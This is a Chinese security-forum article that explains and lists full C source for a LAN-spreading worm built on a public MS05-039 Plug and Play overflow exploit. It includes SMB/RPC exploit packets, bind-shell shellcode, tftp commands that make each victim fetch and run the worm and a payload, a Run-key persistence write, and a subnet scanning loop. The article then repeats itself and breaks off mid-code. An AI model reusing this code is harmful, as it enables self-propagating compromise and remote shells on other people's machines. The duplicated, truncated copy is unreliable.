文章作者:张戈(nickchang)
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
今年8月的新蠕虫狙击波利用了ms05039 PnP服务漏洞, 因为ms05039的exploit在网上是公开的,请见http://www.eviloctal.com/forum/htm_data/10/0508/13433.html, 可以利用这个exploit得到对方主机(win2k)的shell, 所以用这个exploit做一个蠕虫并不难。
声明:本文出于教学目的,修改导致任何后果与作者无关
实现的思路是,先在本机建立一个tftp服务器,然后得到局域网各个机器的ip地址,(不想惹麻烦,没有加上生成随机地址的代码,所以不会在公网上传播),然后逐个溢出,得到shell,再发送命宁,让对方主机用TFTP从本机下载3个文件,一个蠕虫文件,一个tftp服务端,一个payload文件。(思路来自Malware-fighting malicious code一书,作者比喻这种方式是搬家式的蠕虫,因为除了蠕虫自己以外,还需要把环境复制到对方主机中)。然后再发送命宁让对方主机执行蠕虫文件。执行时,先产生一个互斥量,确保只有一个蠕虫进程在机器上运行,然后写入注册表,实现下次开机自启动,再后面的过程就和开头一样了,如此反复循环。
以下是代码,winxp+vc6.0下编译通过, 注意目标主机只对win2k有效
声明:代码中精华部分是.::[ houseofdabus ]::.的exploit。
//这个是shellcode.h
///********************************************************
//以下shell code是.::[ houseofdabus ]::.的ms05039溢出exploit
//用于buffer overflow,是蠕虫的精华部分
//*********************************************************
/* #define _WIN32 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef _WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <netdb.h>
#endif
char SMB_Negotiate[] =
"/x00/x00/x00/x85/xFF/x53/x4D/x42/x72/x00/x00/x00/x00/x18/x53/xC8"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/xFF/xFE"
"/x00/x00/x00/x00/x00/x62/x00/x02/x50/x43/x20/x4E/x45/x54/x57/x4F"
"/x52/x4B/x20/x50/x52/x4F/x47/x52/x41/x4D/x20/x31/x2E/x30/x00/x02"
"/x4C/x41/x4E/x4D/x41/x4E/x31/x2E/x30/x00/x02/x57/x69/x6E/x64/x6F"
"/x77/x73/x20/x66/x6F/x72/x20/x57/x6F/x72/x6B/x67/x72/x6F/x75/x70"
"/x73/x20/x33/x2E/x31/x61/x00/x02/x4C/x4D/x31/x2E/x32/x58/x30/x30"
"/x32/x00/x02/x4C/x41/x4E/x4D/x41/x4E/x32/x2E/x31/x00/x02/x4E/x54"
"/x20/x4C/x4D/x20/x30/x2E/x31/x32/x00";
char SMB_SessionSetupAndX[] =
"/x00/x00/x00/xA4/xFF/x53/x4D/x42/x73/x00/x00/x00/x00/x18/x07/xC8"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/xFF/xFE"
"/x00/x00/x10/x00/x0C/xFF/x00/xA4/x00/x04/x11/x0A/x00/x00/x00/x00"
"/x00/x00/x00/x20/x00/x00/x00/x00/x00/xD4/x00/x00/x80/x69/x00/x4E"
"/x54/x4C/x4D/x53/x53/x50/x00/x01/x00/x00/x00/x97/x82/x08/xE0/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x57/x00/x69/x00/x6E/x00/x64/x00/x6F/x00/x77/x00/x73/x00/x20/x00"
"/x32/x00/x30/x00/x30/x00/x30/x00/x20/x00/x32/x00/x31/x00/x39/x00"
"/x35/x00/x00/x00/x57/x00/x69/x00/x6E/x00/x64/x00/x6F/x00/x77/x00"
"/x73/x00/x20/x00/x32/x00/x30/x00/x30/x00/x30/x00/x20/x00/x35/x00"
"/x2E/x00/x30/x00/x00/x00/x00/x00";
char SMB_SessionSetupAndX2[] =
"/x00/x00/x00/xDA/xFF/x53/x4D/x42/x73/x00/x00/x00/x00/x18/x07/xC8"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/xFF/xFE"
"/x00/x08/x20/x00/x0C/xFF/x00/xDA/x00/x04/x11/x0A/x00/x00/x00/x00"
"/x00/x00/x00/x57/x00/x00/x00/x00/x00/xD4/x00/x00/x80/x9F/x00/x4E"
"/x54/x4C/x4D/x53/x53/x50/x00/x03/x00/x00/x00/x01/x00/x01/x00/x46"
"/x00/x00/x00/x00/x00/x00/x00/x47/x00/x00/x00/x00/x00/x00/x00/x40"
"/x00/x00/x00/x00/x00/x00/x00/x40/x00/x00/x00/x06/x00/x06/x00/x40"
"/x00/x00/x00/x10/x00/x10/x00/x47/x00/x00/x00/x15/x8A/x88/xE0/x48"
"/x00/x4F/x00/x44/x00/x00/xED/x41/x2C/x27/x86/x26/xD2/x59/xA0/xB3"
"/x5E/xAA/x00/x88/x6F/xC5/x57/x00/x69/x00/x6E/x00/x64/x00/x6F/x00"
"/x77/x00/x73/x00/x20/x00/x32/x00/x30/x00/x30/x00/x30/x00/x20/x00"
"/x32/x00/x31/x00/x39/x00/x35/x00/x00/x00/x57/x00/x69/x00/x6E/x00"
"/x64/x00/x6F/x00/x77/x00/x73/x00/x20/x00/x32/x00/x30/x00/x30/x00"
"/x30/x00/x20/x00/x35/x00/x2E/x00/x30/x00/x00/x00/x00/x00";
char SMB_TreeConnectAndX[] =
"/x00/x00/x00/x5A/xFF/x53/x4D/x42/x75/x00/x00/x00/x00/x18/x07/xC8"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/xFF/xFE"
"/x00/x08/x30/x00/x04/xFF/x00/x5A/x00/x08/x00/x01/x00/x2F/x00/x00";
char SMB_TreeConnectAndX_[] =
"/x00/x00/x3F/x3F/x3F/x3F/x3F/x00";
/* browser */
char SMB_PipeRequest_browser[] =
"/x00/x00/x00/x66/xFF/x53/x4D/x42/xA2/x00/x00/x00/x00/x18/x07/xC8"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x08/x78/x04"
"/x00/x08/x40/x00/x18/xFF/x00/xDE/xDE/x00/x10/x00/x16/x00/x00/x00"
"/x00/x00/x00/x00/x9F/x01/x02/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x01/x00/x00/x00/x40/x00/x00/x00"
"/x02/x00/x00/x00/x03/x13/x00/x00/x5C/x00/x62/x00/x72/x00/x6F/x00"
"/x77/x00/x73/x00/x65/x00/x72/x00/x00/x00";
char SMB_PNPEndpoint[] =
/* 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0: pnp */
"/x00/x00/x00/x9C/xFF/x53/x4D/x42/x25/x00/x00/x00/x00/x18/x07/xC8"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x08/x78/x04"
"/x00/x08/x50/x00/x10/x00/x00/x48/x00/x00/x00/x00/x10/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x54/x00/x48/x00/x54/x00/x02"
"/x00/x26/x00/x00/x40/x59/x00/x00/x5C/x00/x50/x00/x49/x00/x50/x00"
"/x45/x00/x5C/x00/x00/x00/x40/x00/x05/x00/x0B/x03/x10/x00/x00/x00"
"/x48/x00/x00/x00/x01/x00/x00/x00/xB8/x10/xB8/x10/x00/x00/x00/x00"
"/x01/x00/x00/x00/x00/x00/x01/x00/x40/x4E/x9F/x8D/x3D/xA0/xCE/x11"
"/x8F/x69/x08/x00/x3E/x30/x05/x1B/x01/x00/x00/x00/x04/x5D/x88/x8A"
"/xEB/x1C/xC9/x11/x9F/xE8/x08/x00/x2B/x10/x48/x60/x02/x00/x00/x00";
char RPC_call[] =
"/x00/x00/x08/x90/xFF/x53/x4D/x42/x25/x00/x00/x00/x00/x18/x07/xC8"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x08/x78/x04"
"/x00/x08/x60/x00/x10/x00/x00/x3C/x08/x00/x00/x00/x01/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x54/x00/x3C/x08/x54/x00/x02"
"/x00/x26/x00/x00/x40/x4D/x08/x00/x5C/x00/x50/x00/x49/x00/x50/x00"
"/x45/x00/x5C/x00/x00/x00/x40/x00/x05/x00/x00/x03/x10/x00/x00/x00"
"/x3C/x08/x00/x00/x01/x00/x00/x00/x24/x08/x00/x00/x00/x00/x36/x00"
"/x11/x00/x00/x00/x00/x00/x00/x00/x11/x00/x00/x00/x52/x00/x4F/x00"
"/x4F/x00/x54/x00/x5C/x00/x53/x00/x59/x00/x53/x00/x54/x00/x45/x00"
"/x4D/x00/x5C/x00/x30/x00/x30/x00/x30/x00/x30/x00/x00/x00/x00/x00"
"/xFF/xFF/x00/x00/xE0/x07/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/xC0/x07/x00/x00/x00/x00/x00/x00/x90/x90/x90/x90/x90/x90/x90/x90"
"/xEB/x08/x90/x90/x67/x15/x7a/x76/xEB/x08/x90/x90/x67/x15/x7a/x76"
"/xEB/x08/x90/x90/x67/x15/x7a/x76/xEB/x08/x90/x90/x67/x15/x7a/x76"
"/xEB/x08/x90/x90/x67/x15/x7a/x76/xEB/x08/x90/x90/x67/x15/x7a/x76"
"/xEB/x08/x90/x90/x67/x15/x7a/x76/xEB/x08/x90/x90/x67/x15/x7a/x76"
/* jmp over - entry point */
"/xEB/x08/x90/x90"
/* pop reg; pop reg; retn; - umpnpmgr.dll */
"/x67/x15/x7a/x76" /* 0x767a1567 */
/* jmp ebx - umpnpmgr.dll
"/x6f/x36/x7a/x76" */
"/xEB/x08/x90/x90/x67/x15/x7a/x76"
"/x90/x90/x90/x90/x90/x90/x90/xEB/x08/x90/x90/x48/x4F/x44/x88/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90";
char RPC_call_end[] =
"/xE0/x07/x00/x00/x04/x00/x00/x00/x00/x00/x00/x00";
char bind_shellcode[] =
"/x29/xc9/x83/xe9/xb0/xd9/xee/xd9/x74/x24/xf4/x5b/x81/x73/x13/x19"
"/xf5/x04/x37/x83/xeb/xfc/xe2/xf4/xe5/x9f/xef/x7a/xf1/x0c/xfb/xc8"
"/xe6/x95/x8f/x5b/x3d/xd1/x8f/x72/x25/x7e/x78/x32/x61/xf4/xeb/xbc"
"/x56/xed/x8f/x68/x39/xf4/xef/x7e/x92/xc1/x8f/x36/xf7/xc4/xc4/xae"
"/xb5/x71/xc4/x43/x1e/x34/xce/x3a/x18/x37/xef/xc3/x22/xa1/x20/x1f"
"/x6c/x10/x8f/x68/x3d/xf4/xef/x51/x92/xf9/x4f/xbc/x46/xe9/x05/xdc"
"/x1a/xd9/x8f/xbe/x75/xd1/x18/x56/xda/xc4/xdf/x53/x92/xb6/x34/xbc"
"/x59/xf9/x8f/x47/x05/x58/x8f/x77/x11/xab/x6c/xb9/x57/xfb/xe8/x67"
"/xe6/x23/x62/x64/x7f/x9d/x37/x05/x71/x82/x77/x05/x46/xa1/xfb/xe7"
"/x71/x3e/xe9/xcb/x22/xa5/xfb/xe1/x46/x7c/xe1/x51/x98/x18/x0c/x35"
"/x4c/x9f/x06/xc8/xc9/x9d/xdd/x3e/xec/x58/x53/xc8/xcf/xa6/x57/x64"
"/x4a/xa6/x47/x64/x5a/xa6/xfb/xe7/x7f/x9d/x1a/x55/x7f/xa6/x8d/xd6"
"/x8c/x9d/xa0/x2d/x69/x32/x53/xc8/xcf/x9f/x14/x66/x4c/x0a/xd4/x5f"
"/xbd/x58/x2a/xde/x4e/x0a/xd2/x64/x4c/x0a/xd4/x5f/xfc/xbc/x82/x7e"
"/x4e/x0a/xd2/x67/x4d/xa1/x51/xc8/xc9/x66/x6c/xd0/x60/x33/x7d/x60"
"/xe6/x23/x51/xc8/xc9/x93/x6e/x53/x7f/x9d/x67/x5a/x90/x10/x6e/x67"
"/x40/xdc/xc8/xbe/xfe/x9f/x40/xbe/xfb/xc4/xc4/xc4/xb3/x0b/x46/x1a"
"/xe7/xb7/x28/xa4/x94/x8f/x3c/x9c/xb2/x5e/x6c/x45/xe7/x46/x12/xc8"
"/x6c/xb1/xfb/xe1/x42/xa2/x56/x66/x48/xa4/x6e/x36/x48/xa4/x51/x66"
"/xe6/x25/x6c/x9a/xc0/xf0/xca/x64/xe6/x23/x6e/xc8/xe6/xc2/xfb/xe7"
"/x92/xa2/xf8/xb4/xdd/x91/xfb/xe1/x4b/x0a/xd4/x5f/xf6/x3b/xe4/x57"
"/x4a/x0a/xd2/xc8/xc9/xf5/x04/x37";
#define SET_PORTBIND_PORT(buf, port) /
*(unsigned short *)(((buf)+186)) = (port)
//这个是worm.cpp
// worm.cpp : Defines the entry point for the application.
//
#include "stdafx.h"
#include "stdafx.h"
#include "shellcode.h"
#include <windows.h>
#include <stdio.h>
#include <shellapi.h>
void convert_name(char *out, char *name)
{
unsigned long len;
len = strlen(name);
out += len * 2 - 1;
while (len--) {
*out-- = '/x00';
*out-- = name[len];
}
}
//********************************************************
//GetShell是.::[ houseofdabus ]::.写的ms05039溢出exploit
//可以得到远程win2k主机的shell,是蠕虫的精华部分
//*********************************************************
int GetShell(char* IP_address)
{
struct sockaddr_in addr;
struct hostent *he;
int len;
int sockfd;
unsigned short smblen;
unsigned short bindport;
char tmp[1024];
char packet[4096];
char *ptr;
char recvbuf[4096];
#ifdef _WIN32
WSADATA wsa;
WSAStartup(MAKEWORD(2,0), &wsa);
#endif
if ((he = gethostbyname(IP_address)) == NULL) {
return 1;
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
return 1;
}
addr.sin_family = AF_INET;
addr.sin_port = htons(445);
addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(addr.sin_zero), '/0', 8);
if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
return 1;
}
if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {
return 1;
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
;
return 1;
}
if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {
return 1;
}
len = recv(sockfd, recvbuf, 4096, 0);
if (len <= 10) {
return 1;
}
if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {
return 1;
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
return 1;
}
ptr = packet;
memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
ptr += sizeof(SMB_TreeConnectAndX)-1;
sprintf(tmp, "%s//IPC$", IP_address);
convert_name(ptr, tmp);
smblen = strlen(tmp)*2;
ptr += smblen;
smblen += 9;
memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);
memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
ptr += sizeof(SMB_TreeConnectAndX_)-1;
smblen = ptr-packet;
smblen -= 4;
memcpy(packet+3, &smblen, 1);
if (send(sockfd, packet, ptr-packet, 0) < 0) {
return 1;
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
return 1;
}
if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {
return 1;
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
return 1;
}
if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {
return 1;
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
return 1;
}
// nop
ptr = packet;
memset(packet, '/x90', sizeof(packet));
// header & offsets
memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
ptr += sizeof(RPC_call)-1;
// shellcode
bindport = 7777;
bindport ^= 0x0437;
SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);
// end of packet
memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
RPC_call_end,
sizeof(RPC_call_end)-1);
// sending...
if (send(sockfd, packet, 2196, 0) < 0) {
return 1;
}
return 0;
}
//*******************************************************
//繁殖复制 by nick chang
//********************************************************
int propagate(char *IP_address)
{
struct sockaddr_in addr;
struct hostent *he;
int sockfd;
char recvbuf[4096];
#ifdef _WIN32
WSADATA wsa;
WSAStartup(MAKEWORD(2,0), &wsa);
#endif
char szHostname[256];
char *pszAddr;
struct hostent *pHost;
//得到本机的IP地址
if(gethostname(szHostname,sizeof(szHostname))==0)
{
pHost=gethostbyname(szHostname);
if(pHost)
pszAddr=inet_ntoa(*(struct in_addr *) pHost->h_addr_list[0]);
}
//发送3传送文件命令,让远程主机从本机取3个文件
//tftpd32是tftp的服务端,即在每个受害主机上建立一个tftp服务器
//worm 就是这个蠕虫文件本身了
//payload就是一个负载文件,可以是后门,也可以是ddos的客户端
char sendserver[40];
char sendworm[40];
char sendpayload[40];
sprintf(sendserver,"tftp -i %s GET tftpd32.exe/n",pszAddr);
sprintf(sendworm,"tftp -i %s GET worm.exe/n",pszAddr);
sprintf(sendpayload,"tftp -i %s GET payload.exe/n",pszAddr);
if ((he = gethostbyname(IP_address)) == NULL) {
return 1;
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
return 1;
}
addr.sin_family = AF_INET;
addr.sin_port = htons(7777);
addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(addr.sin_zero), '/0', 8);
if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
return 1;
}
recv(sockfd, recvbuf, 4096, 0);
//向远方主机发送3个取文件的命宁
if (send(sockfd, sendserver, strlen(sendserver), 0) < 0) {
return 1;
}
Sleep(500);
if (send(sockfd, sendworm, strlen(sendworm), 0) < 0) {
return 1;
}
Sleep(500);
if (send(sockfd, sendpayload, strlen(sendpayload), 0) < 0) {
return 1;
}
Sleep(500);
//向远方主机发送执行蠕虫的命宁
if (send(sockfd, "start ee.exe/n", strlen("start worm.exe/n"), 0) < 0) {
return 1;
}
Sleep(500);
if (send(sockfd, "ee.exe/n", strlen("worm.exe/n"), 0) < 0) {
return 1;
}
return 0;
}
//*****************************************************
//蠕虫线程,得到shell和复制by nick chang
//******************************************************
DWORD WINAPI Attack(LPVOID p)
{
int ret;
char *IP_address = (char *)p;
if((ret=GetShell(IP_address))== 0)
propagate(IP_address);
return 0;
}
//********************************************************
//假设mask 255.255.255.0 by nick chang
//*********************************************************
void gethost(char* pszAddr)
{
int i=0;
int j=0;
while(i!=3)
{
if(pszAddr[j] == '.')
i++;
j++;
}
pszAddr[j] = '/0';
}
//********************************************************
//主程序by nick chang
//********************************************************
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
char szHostname[256];
char *pszAddr;
struct hostent *pHost;
WORD wVersionRequested;
WSADATA wsaData;
int err;
wVersionRequested = MAKEWORD( 2, 2 );
err = WSAStartup( wVersionRequested, &wsaData );
//创建一个互斥量,确保只有一个蠕虫在运行
HANDLE m_hMutex = CreateMutex(NULL, NULL, "wormmutex");
if(GetLastError()==ERROR_ALREADY_EXISTS)
{
return 1;
}
//执行 payload
for(int i =0; i<20;i++)
ShellExecute(NULL,"open","payload.exe","","", SW_SHOW );
//运行tftp服务
ShellExecute(NULL,"open","tftpd32.exe","","", SW_HIDE );
DWORD dwThreadID;
//写入注册表,开机时自动运行蠕虫
HKEY hKey;
char path[] = "c://winnt//system32//worm.exe";
char data_Set[] = "Software//Microsoft//Windows//CurrentVersion//Run";
int len = strlen(path);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,data_Set,0,KEY_WRITE,&hKey);
RegSetValueEx(hKey,NULL,NULL,REG_SZ,(LPBYTE)path,len);
RegCloseKey(hKey);
//得到自己的地址
if(gethostname(szHostname,sizeof(szHostname))==0)
{
pHost=gethostbyname(szHostname);
if(pHost)
pszAddr=inet_ntoa(*(struct in_addr *) pHost->h_addr_list[0]);
}
while(1)
{
//由自己的地址穷举局域网里的其他机器的地址,假设mask255.255.255.0
for(int i=1 ; i<255; i++)
{
gethost(pszAddr);
sprintf(pszAddr,"%s%i",pszAddr,i);
//以这个地址创造攻击线程
CreateThread(NULL,0,Attack,pszAddr,0,&dwThreadID);
Sleep(500);
}
Sleep(30000);//停一段时间在攻击,以免对方直接crash.
}
return 0;
}
在学校实验室测试通过,payload我用了一个毛毛虫的桌面宠物,结果机房里面的机器屏幕上爬满了毛毛虫。。。。。
声明:本人是菜鸟,代码质量不高,有写的不对的地方,请各位高手多多指教
nickchang918@hotmail.com
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
今年8月的新蠕虫狙击波利用了ms05039 PnP服务漏洞, 因为ms05039的exploit在网上是公开的,请见http://www.eviloctal.com/forum/htm_data/10/0508/13433.html, 可以利用这个exploit得到对方主机(win2k)的shell, 所以用这个exploit做一个蠕虫并不难。
声明:本文出于教学目的,修改导致任何后果与作者无关
实现的思路是,先在本机建立一个tftp服务器,然后得到局域网各个机器的ip地址,(不想惹麻烦,没有加上生成随机地址的代码,所以不会在公网上传播),然后逐个溢出,得到shell,再发送命宁,让对方主机用TFTP从本机下载3个文件,一个蠕虫文件,一个tftp服务端,一个payload文件。(思路来自Malware-fighting malicious code一书,作者比喻这种方式是搬家式的蠕虫,因为除了蠕虫自己以外,还需要把环境复制到对方主机中)。然后再发送命宁让对方主机执行蠕虫文件。执行时,先产生一个互斥量,确保只有一个蠕虫进程在机器上运行,然后写入注册表,实现下次开机自启动,再后面的过程就和开头一样了,如此反复循环。
以下是代码,winxp+vc6.0下编译通过, 注意目标主机只对win2k有效
声明:代码中精华部分是.::[ houseofdabus ]::.的exploit。
//这个是shellcode.h
///********************************************************
//以下shell code是.::[ houseofdabus ]::.的ms05039溢出exploit
//用于buffer overflow,是蠕虫的精华部分
//*********************************************************
/* #define _WIN32 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef _WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <netdb.h>
#endif
char SMB_Negotiate[] =
"/x00/x00/x00/x85/xFF/x53/x4D/x42/x72/x00/x00/x00/x00/x18/x53/xC8"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/xFF/xFE"
"/x00/x00/x00/x00/x00/x62/x00/x02/x50/x43/x20/x4E/x45/x54/x57/x4F"
"/x52/x4B/x20/x50/x52/x4F/x47/x52/x41/x4D/x20/x31/x2E/x30/x00/x02"
"/x4C/x41/x4E/x4D/x41/x4E/x31/x2E/x30/x00/x02/x57/x69/x6E/x64/x6F"
"/x77/x73/x20/x66/x6F/x72/x20/x57/x6F/x72/x6B/x67/x72/x6F/x75/x70"
"/x73/x20/x33/x2E/x31/x61/x00/x02/x4C/x4D/x31/x2E/x32/x58/x30/x30"
"/x32/x00/x02/x4C/x41/x4E/x4D/x41/x4E/x32/x2E/x31/x00/x02/x4E/x54"
"/x20/x4C/x4D/x20/x30/x2E/x31/x32/x00";
char SMB_SessionSetupAndX[] =
"/x00/x00/x00/xA4/xFF/x53/x4D/x42/x73/x00/x00/x00/x00/x18/x07/xC8"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/xFF/xFE"
"/x00/x00/x10/x00/x0C/xFF/x00/xA4/x00/x04/x11/x0A/x00/x00/x00/x00"
"/x00/x00/x00/x20/x00/x00/x00/x00/x00/xD4/x00/x00/x80/x69/x00/x4E"
"/x54/x4C/x4D/x53/x53/x50/x00/x01/x00/x00/x00/x97/x82/x08/xE0/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x57/x00/x69/x00/x6E/x00/x64/x00/x6F/x00/x77/x00/x73/x00/x20/x00"
"/x32/x00/x30/x00/x30/x00/x30/x00/x20/x00/x32/x00/x31/x00/x39/x00"
"/x35/x00/x00/x00/x57/x00/x69/x00/x6E/x00/x64/x00/x6F/x00/x77/x00"
"/x73/x00/x20/x00/x32/x00/x30/x00/x30/x00/x30/x00/x20/x00/x35/x00"
"/x2E/x00/x30/x00/x00/x00/x00/x00";
char SMB_SessionSetupAndX2[] =
"/x00/x00/x00/xDA/xFF/x53/x4D/x42/x73/x00/x00/x00/x00/x18/x07/xC8"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/xFF/xFE"
"/x00/x08/x20/x00/x0C/xFF/x00/xDA/x00/x04/x11/x0A/x00/x00/x00/x00"
"/x00/x00/x00/x57/x00/x00/x00/x00/x00/xD4/x00/x00/x80/x9F/x00/x4E"
"/x54/x4C/x4D/x53/x53/x50/x00/x03/x00/x00/x00/x01/x00/x01/x00/x46"
"/x00/x00/x00/x00/x00/x00/x00/x47/x00/x00/x00/x00/x00/x00/x00/x40"
"/x00/x00/x00/x00/x00/x00/x00/x40/x00/x00/x00/x06/x00/x06/x00/x40"
"/x00/x00/x00/x10/x00/x10/x00/x47/x00/x00/x00/x15/x8A/x88/xE0/x48"
"/x00/x4F/x00/x44/x00/x00/xED/x41/x2C/x27/x86/x26/xD2/x59/xA0/xB3"
"/x5E/xAA/x00/x88/x6F/xC5/x57/x00/x69/x00/x6E/x00/x64/x00/x6F/x00"
"/x77/x00/x73/x00/x20/x00/x32/x00/x30/x00/x30/x00/x30/x00/x20/x00"
"/x32/x00/x31/x00/x39/x00/x35/x00/x00/x00/x57/x00/x69/x00/x6E/x00"
"/x64/x00/x6F/x00/x77/x00/x73/x00/x20/x00/x32/x00/x30/x00/x30/x00"
"/x30/x00/x20/x00/x35/x00/x2E/x00/x30/x00/x00/x00/x00/x00";
char SMB_TreeConnectAndX[] =
"/x00/x00/x00/x5A/xFF/x53/x4D/x42/x75/x00/x00/x00/x00/x18/x07/xC8"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/xFF/xFE"
"/x00/x08/x30/x00/x04/xFF/x00/x5A/x00/x08/x00/x01/x00/x2F/x00/x00";
char SMB_TreeConnectAndX_[] =
"/x00/x00/x3F/x3F/x3F/x3F/x3F/x00";
/* browser */
char SMB_PipeRequest_browser[] =
"/x00/x00/x00/x66/xFF/x53/x4D/x42/xA2/x00/x00/x00/x00/x18/x07/xC8"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x08/x78/x04"
"/x00/x08/x40/x00/x18/xFF/x00/xDE/xDE/x00/x10/x00/x16/x00/x00/x00"
"/x00/x00/x00/x00/x9F/x01/x02/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x01/x00/x00/x00/x40/x00/x00/x00"
"/x02/x00/x00/x00/x03/x13/x00/x00/x5C/x00/x62/x00/x72/x00/x6F/x00"
"/x77/x00/x73/x00/x65/x00/x72/x00/x00/x00";
char SMB_PNPEndpoint[] =
/* 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0: pnp */
"/x00/x00/x00/x9C/xFF/x53/x4D/x42/x25/x00/x00/x00/x00/x18/x07/xC8"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x08/x78/x04"
"/x00/x08/x50/x00/x10/x00/x00/x48/x00/x00/x00/x00/x10/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x54/x00/x48/x00/x54/x00/x02"
"/x00/x26/x00/x00/x40/x59/x00/x00/x5C/x00/x50/x00/x49/x00/x50/x00"
"/x45/x00/x5C/x00/x00/x00/x40/x00/x05/x00/x0B/x03/x10/x00/x00/x00"
"/x48/x00/x00/x00/x01/x00/x00/x00/xB8/x10/xB8/x10/x00/x00/x00/x00"
"/x01/x00/x00/x00/x00/x00/x01/x00/x40/x4E/x9F/x8D/x3D/xA0/xCE/x11"
"/x8F/x69/x08/x00/x3E/x30/x05/x1B/x01/x00/x00/x00/x04/x5D/x88/x8A"
"/xEB/x1C/xC9/x11/x9F/xE8/x08/x00/x2B/x10/x48/x60/x02/x00/x00/x00";
char RPC_call[] =
"/x00/x00/x08/x90/xFF/x53/x4D/x42/x25/x00/x00/x00/x00/x18/x07/xC8"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x08/x78/x04"
"/x00/x08/x60/x00/x10/x00/x00/x3C/x08/x00/x00/x00/x01/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x54/x00/x3C/x08/x54/x00/x02"
"/x00/x26/x00/x00/x40/x4D/x08/x00/x5C/x00/x50/x00/x49/x00/x50/x00"
"/x45/x00/x5C/x00/x00/x00/x40/x00/x05/x00/x00/x03/x10/x00/x00/x00"
"/x3C/x08/x00/x00/x01/x00/x00/x00/x24/x08/x00/x00/x00/x00/x36/x00"
"/x11/x00/x00/x00/x00/x00/x00/x00/x11/x00/x00/x00/x52/x00/x4F/x00"
"/x4F/x00/x54/x00/x5C/x00/x53/x00/x59/x00/x53/x00/x54/x00/x45/x00"
"/x4D/x00/x5C/x00/x30/x00/x30/x00/x30/x00/x30/x00/x00/x00/x00/x00"
"/xFF/xFF/x00/x00/xE0/x07/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/xC0/x07/x00/x00/x00/x00/x00/x00/x90/x90/x90/x90/x90/x90/x90/x90"
"/xEB/x08/x90/x90/x67/x15/x7a/x76/xEB/x08/x90/x90/x67/x15/x7a/x76"
